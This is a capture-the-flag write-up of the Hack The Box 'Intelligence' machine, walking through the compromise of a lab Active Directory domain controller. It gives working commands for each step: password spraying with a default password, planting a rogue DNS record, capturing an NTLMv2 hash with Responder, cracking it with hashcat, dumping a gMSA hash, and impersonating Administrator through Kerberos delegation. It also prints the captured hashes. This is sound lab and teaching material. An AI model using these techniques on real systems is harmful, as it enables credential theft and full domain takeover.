Link: https://app.hackthebox.eu/machines/357
Uncredentialed Enumeration
TCP Port Scan
Our initial port scan reveals 10 open ports, including: SMB, web server, ldap, DNS, kerberos.
SMB Share
Using smbclient -L 10.129.122.188
allows us to anonymously login, however we cannot see any shares. I also tested some nmap
scripts using --script=smb-enum-*
and --script-smb-vuln-*
. I did get some useful results with --script=smb2*
Mainly just the security mode having message signing enabled and required.
smbmap
fails to provide useful results.
LDAP Enumeration
I attempted to use a Python script for enumeration, but without credentials it fails to bind.
DNS Enumeration
Attempting to use tools such as nslookup
, dnsenum
and dnsrecon
failed to provide useful results.
Web Server
Navigating to the IP over port 80 serves a standard bootstrap template page. There is a form for collecting an email address but it is not hooked up to actually send/collect data.
I performed a gobuster dir
scan, this scan did turn up a /documents
endpoint with directory indexing off. Attempting to access this directory returns a 403 Forbidden error.
$ gobuster dir -u http://10.129.122.188/ -w /usr/share/wordlists/dirb/big.txt
I also mapped the IP to intelligence.htb
in /etc/hosts
and performed a gobuster vhost
scan to search for any notable subdomains. If not already installed, you can download SecLists from here.
$ gobuster vhost -u http://intelligence.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
This search returned nothing useful.
Looking closer at the source code, everything appears to be stored in the /documents
directory. We can also see two files with the format yyyy-mm-dd-upload.pdf
. I created a python script to generate two years worth of filenames formatted this way and ran it through gobuster.
For the file generation:
Now for gobuster:
$ gobuster dir -u http://10.129.122.188/documents -w /home/kali/htb/dates.txt -e > docs.txt
This scan reveals 95 PDF files. Many of which are just Lorem Ipsum text, but there are a few files that are noteworthy:
2020-12-30-upload.pdf
Internal IT Update There has recently been some outages on our web servers. Ted has gotten a script in place to help notify us if this happens again. Also, after discussion following our recent security audit we are in the process of locking down our service accounts.
2020-06-04-upload.pdf
New Account Guide Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876 After logging in please change your password as soon as possible.
Using the output from gobuster, I cleaned this document up to have one link per line and then I used wget to grab all the files.
cd ~/Downloads/docs
wget -i ~/docs.txt
strings 202* | grep /Creator
I copied the results of the grep command into a text file and removed duplicates and it gives us a list of 30 unique accounts:
/Creator (William.Lee)
/Creator (Scott.Scott)
/Creator (Jason.Wright)
/Creator (Veronica.Patel)
/Creator (Jennifer.Thomas)
/Creator (Danny.Matthews)
/Creator (David.Reed)
/Creator (Stephanie.Young)
/Creator (Daniel.Shelton)
/Creator (Jose.Williams)
/Creator (John.Coleman)
/Creator (Brian.Morris)
/Creator (Thomas.Valenzuela)
/Creator (Travis.Evans)
/Creator (Samuel.Richardson)
/Creator (Richard.Williams)
/Creator (David.Mcbride)
/Creator (Anita.Roberts)
/Creator (Brian.Baker)
/Creator (Kelly.Long)
/Creator (Nicole.Brock)
/Creator (Kaitlyn.Zimmerman)
/Creator (Jason.Patterson)
/Creator (Darryl.Harris)
/Creator (David.Wilson)
/Creator (Teresa.Williamson)
/Creator (Ian.Duncan)
/Creator (Jessica.Moody)
/Creator (Tiffany.Molina)
/Creator (Thomas.Hall)
I used this list of usernames and the password of NewIntelligenceCorpUser9876
and finally we do get a hit with:
- Tiffany.Molina | NewIntelligenceCorpUser9876
Credentialed Enumeration
SMB Enumeration
With our first set of credentials, we can use some tools to help get more info, such as smbmap
$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina -R
This command recursively lists all files in shares that we have read access to.
Notably, we have access to
\\IT
which has adowndetector.ps1
file inside of it.\Users
which has Administrator, Ted.Graves and Tiffany.Molina folders\Users\Tiffany.Molina\Desktop
which has ouruser.txt
flag
Our access is only at most Read Only.
We can get access to the user flag with:
$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina --download Users/Tiffany.Molina/Desktop/user.txt
I used the same command to grab the downdetector.ps1
file which has the following contents:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves [email protected]' -To 'Ted Graves [email protected]' -Subject "Host: $($record.Name) is down"
}
}
catch {}
}
It appears to check every server in AD every 5 minutes with a name like web*
and then will email Ted.Graves if the status returns anything other than 200.
LDAP Enumeration
I reused the python script from earlier with credentials to get information on ldap:
$ python3 ad-ldap-enum.py -d intelligence.htb -l 10.129.122.188 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
This script drops a few .tsv files that gives us more information into which users are in which groups. Most important for us are the following:
dba Jeremy.Mora NORMAL DONT_EXPIRE_PASSWORD
itsupport Ted.Graves NORMAL DONT_EXPIRE_PASSWORD
itsupport Laura.Lee NORMAL DONT_EXPIRE_PASSWORD
sysadmin Jason.Patterson NORMAL DONT_EXPIRE_PASSWORD
Domain Users Administrator NORMAL DONT_EXPIRE_PASSWORD
Domain Guests Guest DISABLED NORMAL DONT_EXPIRE_PASSWORD
Domain Users krbtgt DISABLED NORMAL DONT_EXPIRE_PASSWORD
...
Domain Users Tiffany.Molina NORMAL DONT_EXPIRE_PASSWORD
The Operating System displays as Windows Server 2019 Datacenter 10.0 (17763)
.
I also installed JXplorer and used [email protected]
as the username for a GUI way of searching through the directory, but I did not find anything of use on any of the users.
Capture the Hash
Our current user account is just a basic level account with only read access to anything, so we need to find another account to pivot to. That powershell script that we found before will search the DNS for any websites starting with “web” and then send an email for Ted to click on. We can capture that with responder and take the hash of the user trying to connect to us.
Phase 1 means we need to add a DNS record into AD starting with web
that points back to our attacking machine. I found a GitHub that has a python script we can use to do this:
Our attacking IP is the one ending in xxx.
$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r web123.intelligence.htb -d 10.10.14.xxx 10.129.122.188
Phase 2 means starting responder to catch the response
$ sudo responder -I tun0 -A
Now we wait until that script runs within 5 minutes and we get a hit!
[HTTP] NTLMv2 Client : 10.129.122.188
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:8a9face4ef7cdc7b:EB65005B0492CBA111472146584E5F65:0101000000000000201FB8A9F89DD701789418BC2F40E95C00000...00000000000000000000900380048005400540050002F007700650062003100320033002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
NTLMv2 includes a time-based response so I don’t think we will be able to do a Pass the Hash attack.
I copied the hash and echo
‘d it to hash.txt
Now we can use hashcat to attempt to crack the hash. We can find the mode from this list here, we know it is NTLMv2.
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o hash_cracked.txt
After a few moments, we get a password output to our text file
SMB Enumeration – Again
Now let’s check to see what we can find in Ted.Graves’ directory on the machine
$ smbmap -p ... -H 10.129.122.188 -u Ted.Graves -R
I don’t see anything of use here.
Escalation
Get NT Hash for Service Account
In the note that we read before, there was a mention of service accounts being updated. I found a Github for a dump of Group Managed Service Accounts information.
$ python3 gMSADumper.py -u Ted.Graves -p ... -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
This gives us the NT hash for svc_int. Now we can use some impacket tools to further our cause
Exchange Hash for Kerberos Ticket
Impacket has a tool named getST.py that “Given a password, hash or aesKey, it will request a Service Ticket and save it as ccache”. On kali, I ran cd opt/impacket/examples
to find the script.
Looking at the commands, we need to find the SPN, or target service, to generate a ticket for. Using Ted’s credentials, let’s investigate ldap once more. This help article from Microsoft tells us what to look for in AD, the ms-DS-Allowed-To-Delegate-To
attribute.
I fired up JXplorer, and navigated to the Managed Service Accounts section. We see the svc_int
account here. Looking under the Table Editor there we can find msDS-AllowedToDelegateTo
with the value we need www/dc.intelligence.htb
.
We need to be sure to add this dc.intelligence.htb
to our /etc/hosts
file now.
Now with the SPN, we can use it as such:
$ python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Unfortunately, the time of my kali virtual box differs too greatly from the windows machine’s time so we are going to need to sync them. We can do so using ntpdate
.
IMPORTANT NOTE: I am using Parallels on a Mac, so I had to change a Parallels setting for it to work:
$ sudo apt-get install ntpdate
$ sudo ntpdate 10.129.122.188
30 Aug 20:18:30 ntpdate[56371]: step time server 10.129.122.188 offset +25199.774292 sec
Now if we rerun the command above for the service ticket:
We now have a service ticket for the admin account we have a couple of different options to connect. I am going to connect via impacket’s smbclient.py
$ smbclient.py -k intelligence.htb/[email protected] -dc-ip 10.129.122.188 -no-pass
Now that we are connected to the client, we can run a few commands to navigate to the ADMIN account
# shares
# use C$
# cd Users
# cd Administrator
# cd Desktop
# get root.txt
It will download root.txt
in whatever directory you were in when you ran the smbclient.py
command. For me it was in ~/htb
.
Conclusion
This machine was really difficult for me and I learned a lot of new tools. I had done a Golden Ticket before on TryHackMe, but the process was very fuzzy so I had to keep doing a lot of research on what to do next. Writing a custom script to discover, download files and build a wordlist of usernames was very cool.
This felt a lot more realistic in the fact we found one account but I had to get another account to then get to another account in order to finally get the flag. A lot of corporations use Windows machines so the experience of using impacket in order to grant a service ticket was very useful knowledge that I am sure will be more useful in the future.
Comments
No comments available.